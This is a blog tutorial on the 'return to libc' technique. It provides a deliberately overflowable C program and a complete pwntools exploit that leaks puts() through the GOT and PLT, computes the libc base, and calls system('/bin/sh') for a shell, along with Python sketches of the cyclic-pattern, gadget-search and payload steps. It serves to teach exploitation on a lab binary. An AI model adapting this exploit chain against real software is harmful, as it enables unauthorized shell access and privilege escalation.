Binary Exploitation Series
Introduction
Welcome to the fascinating world of binary exploitation, where we delve into the intricate art of manipulating computer programs to gain unauthorized access, uncover vulnerabilities, and expand our understanding of software security. In this blog post, we’ll embark on a journey into the technique known as “return to libc,” a classic method employed by exploit developers to bypass security mechanisms and gain control of a vulnerable program.
As technology advances, so do the complexities and challenges associated with securing software systems. To ensure robustness, developers implement various defense mechanisms, such as address space layout randomization (ASLR), stack canaries, and non-executable stack (NX). However, even the most fortified applications can sometimes possess vulnerabilities that clever attackers can exploit.
At its core, “return to libc” is a technique that defeats a non-executable stack by hijacking the program’s control flow and reusing functions that already exist in the C library (libc), rather than injecting new code. It relies on the fact that libc is mapped into the address space of every dynamically linked executable, which makes it a valuable resource for attackers seeking to execute code in the context of the exploited program.
The beauty of return to libc lies in how it deals with the security mechanisms mentioned earlier. NX is not an obstacle because no injected code ever runs. ASLR randomizes the memory locations of key program components, including the libc base address, which makes addresses harder to predict. However, the offsets between functions inside libc stay fixed, so leaking the runtime address of a single function (here, puts()) is enough to compute the libc base and locate every other function reliably. In this post ASLR is disabled and the binary is compiled without stack canaries to keep the example simple.
/* Compile: gcc -fno-stack-protector ret2libc.c -o vuln */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space */
#include <stdio.h>
#include <unistd.h>

int vuln() {
    char buf[80];
    int r;
    /* Bug: reads up to 400 bytes into an 80-byte buffer */
    r = read(0, buf, 400);
    printf("\nRead %d bytes. buf is %s\n", r, buf);
    puts("No shell for you :(");
    return 0;
}

int main(int argc, char *argv[]) {
    printf("Try to exec /bin/sh");
    vuln();
    return 0;
}
Exploiting “return to libc” allows an attacker to achieve various malicious objectives. Here are a few examples:
- Execute Arbitrary Shell Commands: By redirecting the control flow to the system() function from the C library, an attacker can execute arbitrary shell commands within the context of the exploited program. This gives them the same access as the program itself, enabling actions like modifying files, stealing data, or launching further attacks.
- Privilege Escalation: If the exploited program runs with elevated privileges, for example as a privileged user or as a setuid binary, an attacker can leverage “return to libc” to escalate their privileges. By calling functions like setuid() or execve() from the C library, the attacker can keep or gain those higher privileges and perform actions that would otherwise be restricted.
- Bypass Security Mechanisms: “Return to libc” can be used to bypass security mechanisms implemented by the operating system or the compiler. Its main target is the non-executable stack (NX): no injected code runs, so marking the stack non-executable does not stop it. ASLR and stack canaries are not defeated by the technique on its own. With ASLR enabled, the attacker first needs an information leak to learn where libc is loaded, and with stack canaries enabled, the canary value has to be leaked or left intact before the return address can be overwritten.
Steps in order to achieve a full return to libc chain payload:
- Find the padding: the number of bytes needed before we begin to overwrite the saved return address, which ends up in RIP (the instruction pointer).
- Find a pop rdi gadget: this gadget pops a value from the stack into the rdi register, which holds the first argument to a function in the x86-64 calling convention. You can search for such gadgets using tools like ROPgadget or by analyzing the binary with tools like objdump or Ghidra.
- Locate the puts@plt entry: The puts@plt entry is the address of the PLT (Procedure Linkage Table) entry for the puts() function. The PLT is a mechanism used for dynamic function resolution in the binary. You can find the address of puts@plt by examining the binary with tools like objdump or Ghidra.
- Locate the puts@got entry: The puts@got entry is the Global Offset Table (GOT) entry for the puts() function. The GOT stores the actual addresses of dynamically linked functions once they have been resolved. You can find the address of puts@got by examining the binary with tools like objdump or Ghidra.
- Execute the payload: Send the payload to the vulnerable program, triggering the exploitation process. The payload should cause the program to execute the pop rdi gadget, which loads the puts@got address into rdi, and then call puts@plt to print the contents of that entry.
- Extract the leaked libc address: Once the payload runs, the program prints the address of puts() stored in the GOT. Subtracting the offset of puts() inside libc from this address gives the base address of the loaded libc library. With the libc base address, you can find other libc functions for further exploitation.
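The last step is plain arithmetic. The sketch below shows it in isolation, assuming a made-up leak and a made-up puts() offset. Both values are hypothetical; the real offset depends on the libc build on the target.

```python
# Minimal sketch: turn the bytes printed by puts() into a libc base address.
# RAW_LEAK and PUTS_OFFSET are hypothetical values chosen for illustration.

RAW_LEAK = b"\x50\x4e\x85\xf7\xff\x7f"   # 6 bytes; puts() stops at the first null byte
PUTS_OFFSET = 0x84e50                      # assumed offset of puts() inside libc


def parse_leak(raw: bytes) -> int:
    """Pad the leaked bytes to 8 and decode them as a little-endian integer."""
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


def libc_base(leaked_puts: int, puts_offset: int) -> int:
    """The base is the runtime address minus the function's offset in libc."""
    return leaked_puts - puts_offset


leaked = parse_leak(RAW_LEAK)
base = libc_base(leaked, PUTS_OFFSET)
print(hex(leaked))
print(hex(base))
```

A quick sanity check is that the computed base ends in three zero hex digits, since shared libraries are mapped on page boundaries. If it does not, the offset most likely comes from a different libc version.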
How Does the Leak Work
The leak works by taking advantage of the Global Offset Table (GOT) and the Procedure Linkage Table (PLT) entries in the binary, along with a pop rdi gadget, to obtain the address of the puts() function from the libc library.
- GOT Entry for puts(): The GOT is a table that holds the addresses of dynamically linked functions. When a function from an external library, such as puts(), is called, the program takes the address from the GOT. With lazy binding, the GOT entry for puts() initially points back into the corresponding PLT stub. After the first call, the dynamic linker replaces it with the real address of puts() in libc.
- PLT Entry for puts(): The Procedure Linkage Table (PLT) is a mechanism used for dynamic function resolution. The PLT entry for puts() is a small piece of code that jumps through the GOT entry and, on the first call, asks the dynamic linker to resolve the actual address of the puts() function in the libc library.
- pop rdi gadget: A pop rdi gadget is a sequence of instructions in the binary that pops a value from the stack into the rdi register and then returns. The rdi register holds the first argument to a function in the x86-64 calling convention.
- Crafting the Payload: The payload is a sequence of padding and addresses. After the padding, it contains the address of the pop rdi gadget, followed by the address of the puts@got entry, and finally the address of the puts@plt entry.
- Execution of the Payload: When vuln() returns, it jumps to the pop rdi gadget. This instruction pops the next value from the stack into the rdi register, which is the address of the puts@got entry.
- Calling puts@plt: After the pop rdi gadget, its ret instruction takes the next address from the stack, which is the puts@plt entry. The code at this address jumps to the actual address of the puts() function in libc.
- Printing the Leaked Address: The puts() function is called with the address of the puts@got entry in the rdi register, so it prints the bytes stored in that entry. Because vuln() has already called puts() once, the entry has been resolved and holds the real address of puts() in libc. This is the leaked libc address. puts() stops at the first null byte, so only the non-zero low bytes are printed, and the exploit has to pad the value back to 8 bytes.
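To make the sequence above concrete, here is a toy model of what the CPU does with the leak chain. It is only a sketch: the addresses, the fake memory, and the run_chain helper are all hypothetical, and real gadgets are machine code rather than Python branches.

```python
import struct

# Hypothetical addresses, for illustration only.
POP_RDI_RET = 0x401233
PUTS_GOT = 0x404018
PUTS_PLT = 0x401030
PUTS_IN_LIBC = 0x7ffff7854e50

# Fake memory: the GOT slot already holds the resolved libc address.
memory = {PUTS_GOT: struct.pack("<Q", PUTS_IN_LIBC)}

# The part of the payload that lands on the saved return address and above.
chain = struct.pack("<QQQ", POP_RDI_RET, PUTS_GOT, PUTS_PLT)


def run_chain(chain: bytes) -> bytes:
    """Walk the chain 8 bytes at a time the way successive `ret`s would."""
    stack = list(struct.unpack("<%dQ" % (len(chain) // 8), chain))
    rdi = 0
    output = b""
    while stack:
        target = stack.pop(0)          # `ret` pops the next address into RIP
        if target == POP_RDI_RET:
            rdi = stack.pop(0)         # `pop rdi` takes the following value
        elif target == PUTS_PLT:
            data = memory[rdi]         # puts() prints the bytes rdi points at
            output += data.split(b"\x00")[0] + b"\n"   # up to the first null byte
    return output


printed = run_chain(chain)
print(printed)
```

The model prints six bytes plus a newline, not eight, because the two high bytes of a user-space address are zero and puts() treats them as the end of the string.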
Finding the Padding
The fastest way to find the padding is gdb-peda, which has a command called pattern create that generates a cyclic pattern of a given length.
After creating the cyclic pattern, type r to start the program. When the program asks for input, paste the pattern and press ENTER.
We can see that the program crashed at 0x00005555555551ac in vuln().
The command pattern search then looks for pieces of the pattern in the registers.
Using the Information
The output shows that RSP (the stack pointer) points to offset 104 of the pattern. The program faults while executing the ret at the end of vuln(), and on a 64-bit architecture ret pops 8 bytes from the top of the stack into RIP, so at that moment RSP points at the saved return address.
This means that 104 bytes of padding are needed, and the next 8 bytes after them overwrite the return address and therefore the instruction pointer.
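The idea behind a cyclic pattern can be sketched in a few lines. The generator below is a simplified stand-in (an upper/lower/digit pattern in the Metasploit style), not the algorithm gdb-peda uses, and the function names are hypothetical. Because 8-byte windows of the pattern do not repeat, the bytes found at RSP identify the offset.

```python
import string


def pattern_create(length: int) -> bytes:
    """Build a pattern like Aa0Aa1Aa2... whose 8-byte windows do not repeat."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length].encode()
    raise ValueError("requested length exceeds the pattern size")


def pattern_offset(pattern: bytes, needle: bytes) -> int:
    """Return the position of `needle` in `pattern`, or -1 if it is absent."""
    return pattern.find(needle)


pattern = pattern_create(200)
at_rsp = pattern[104:112]          # pretend these 8 bytes were found at RSP
offset = pattern_offset(pattern, at_rsp)

# Padding up to the saved return address, then a placeholder return address.
payload = b"A" * offset + (0xdeadbeef).to_bytes(8, "little")
print(offset, len(payload))
```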
Find a pop rdi gadget
This process is quite simple because there are tools that will automatically find the gadgets for us, such as ROPgadget: https://github.com/JonathanSalwan/ROPgadget
python3 ROPgadget.py --binary ./vuln
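Under the hood, a gadget finder scans the executable sections for byte sequences that decode to useful instructions ending in ret. On x86-64, pop rdi encodes as the single byte 0x5f and ret as 0xc3, so the simplest possible search looks for 5f c3. The sketch below runs on a made-up byte string and a made-up base address rather than a real binary, and find_gadgets is a hypothetical helper. ROPgadget itself does far more, such as parsing the ELF and disassembling candidates.

```python
POP_RDI_RET = b"\x5f\xc3"   # x86-64 encoding of `pop rdi ; ret`


def find_gadgets(code: bytes, needle: bytes, base: int = 0) -> list:
    """Return the address of every occurrence of `needle` inside `code`."""
    hits = []
    pos = code.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = code.find(needle, pos + 1)
    return hits


# Hypothetical chunk of a .text section: `pop r15 ; ret` is 41 5f c3, so a
# `pop rdi ; ret` gadget hides one byte into that instruction.
fake_text = b"\x55\x48\x89\xe5\x41\x5f\xc3\x90\x5f\xc3"
gadgets = find_gadgets(fake_text, POP_RDI_RET, base=0x401000)
print([hex(g) for g in gadgets])
```

The first hit shows why gadgets are often found in places the compiler never intended: jumping into the middle of a longer instruction yields a different, shorter one.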
Putting it Together
To test this, we will write a Python script using pwntools ( https://docs.pwntools.com/en/stable/install.html )
The pwntools library is a powerful and widely used Python library designed for binary exploitation, particularly in the context of Capture The Flag (CTF) competitions and exploit development. It provides a comprehensive set of tools and utilities to assist in various stages of exploit development, including remote communication, payload generation, and exploitation techniques.
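from pwn import *

# context.log_level = 'DEBUG'

# NOTE: the addresses below are taken straight from the ELF, which assumes a
# non-PIE build. For a PIE binary, set elf.address to the load base first.
elf = ELF("./vuln", checksec=False)
libc = elf.libc
rop = ROP(elf)


def start():
    if not args.REMOTE:
        return process("./vuln")
    else:
        return remote("localhost", 1337)


p = start()


def main():
    pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
    ret = rop.find_gadget(['ret'])[0]  # keeps the stack 16-byte aligned for system()
    puts_got = elf.got['puts']
    puts_plt = elf.plt['puts']
    main_addr = elf.symbols['main']

    # Stage 1: print the GOT entry of puts(), then return to main() so the
    # program reads a second payload
    payload = b""
    payload += b"A" * 104
    payload += p64(pop_rdi)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(main_addr)
    p.sendline(payload)

    # Skip the program's own output; the next line comes from our puts() call
    p.recvuntil(b"No shell for you :(\n")
    leaked_puts = u64(p.recvline().strip().ljust(8, b"\x00"))
    log.info("puts@leak: " + hex(leaked_puts))

    # Rebase libc so that its symbols resolve to runtime addresses
    libc.address = leaked_puts - libc.symbols['puts']
    system = libc.symbols['system']
    bin_sh = next(libc.search(b"/bin/sh"))

    # Stage 2: system("/bin/sh")
    payload = b""
    payload += b"A" * 104
    payload += p64(ret)
    payload += p64(pop_rdi)
    payload += p64(bin_sh)
    payload += p64(system)
    p.sendline(payload)
    p.interactive()


if __name__ == "__main__":
    main()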
Explanation
- Leak the Address of puts(): The exploit begins by constructing a payload. It starts with a buffer overflow, filling 104 bytes of padding followed by the address of a pop rdi gadget. This gadget loads the next value from the stack into the rdi register. The payload then includes the address of the puts@got entry (the Global Offset Table entry for the puts() function) and the address of the puts@plt entry (the Procedure Linkage Table entry for puts()). The address of main() is looked up as well, so the chain can return there and the program can read a second payload. This payload is sent to the vulnerable program.
- Retrieve the Leaked Address: After sending the payload, the script discards the program's own output and reads the line printed by the injected puts() call. That line holds the address of puts() stored in the GOT. The code pads it to 8 bytes, converts it to an integer, and calculates the base address of the libc library by subtracting the offset of puts() in libc.
- Calculate Addresses: Using the leaked libc base address, the exploit computes the addresses of system() and of the "/bin/sh" string in libc. These addresses are required to execute shell commands.
- Construct the Final Payload: The payload is constructed similarly to before, with the same 104 bytes of padding. It includes a ret gadget that keeps the stack aligned, a pop rdi gadget, the address of "/bin/sh", and the address of system().
- Send the Final Payload: The payload is sent to the vulnerable program, which causes it to execute system("/bin/sh"), providing a shell that runs with the privileges of the vulnerable program.
- Interactive Shell: Finally, the exploit enters an interactive session, allowing the user to interact with the spawned shell.
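The final stage can be laid out with the standard library alone, which makes the byte layout explicit. In the sketch below every address and offset is hypothetical, and build_stage2 is an illustrative name, not part of pwntools. The extra ret is there because system() may use instructions that expect a 16-byte aligned stack, and a lone ret moves RSP by 8 bytes without changing any other state.

```python
import struct

PADDING = 104                    # offset to the saved return address (from the text)

# Hypothetical values: gadget addresses in the binary, offsets inside libc.
RET = 0x40101a
POP_RDI_RET = 0x401233
LIBC_BASE = 0x7ffff77d0000
SYSTEM_OFFSET = 0x52290
BIN_SH_OFFSET = 0x1b45bd


def build_stage2(libc_base: int) -> bytes:
    """Padding, alignment `ret`, then pop rdi -> "/bin/sh" -> system()."""
    system = libc_base + SYSTEM_OFFSET
    bin_sh = libc_base + BIN_SH_OFFSET
    chain = struct.pack("<QQQQ", RET, POP_RDI_RET, bin_sh, system)
    return b"A" * PADDING + chain


payload = build_stage2(LIBC_BASE)
print(len(payload))
```

Whether the alignment gadget is needed depends on the libc build and on how many 8-byte slots the chain has already consumed, so if the shell does not appear, adding or removing the single ret is a cheap thing to try.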
In conclusion, “return to libc” exploitation is a powerful technique that allows attackers to leverage the functionality of libc functions to achieve their malicious objectives. By redirecting the control flow to the C library, attackers can execute arbitrary shell commands, escalate privileges, bypass security mechanisms, and even achieve remote code execution.
Remember, the goal is not only to understand and exploit vulnerabilities but also to contribute to a safer digital landscape. By sharing knowledge, collaborating, and working together, we can collectively raise the bar on software security and protect against potential threats.
So, let’s continue to learn, innovate, and make a positive impact in the world of cybersecurity. Together, we can build resilient systems and stay one step ahead of those who seek to compromise them.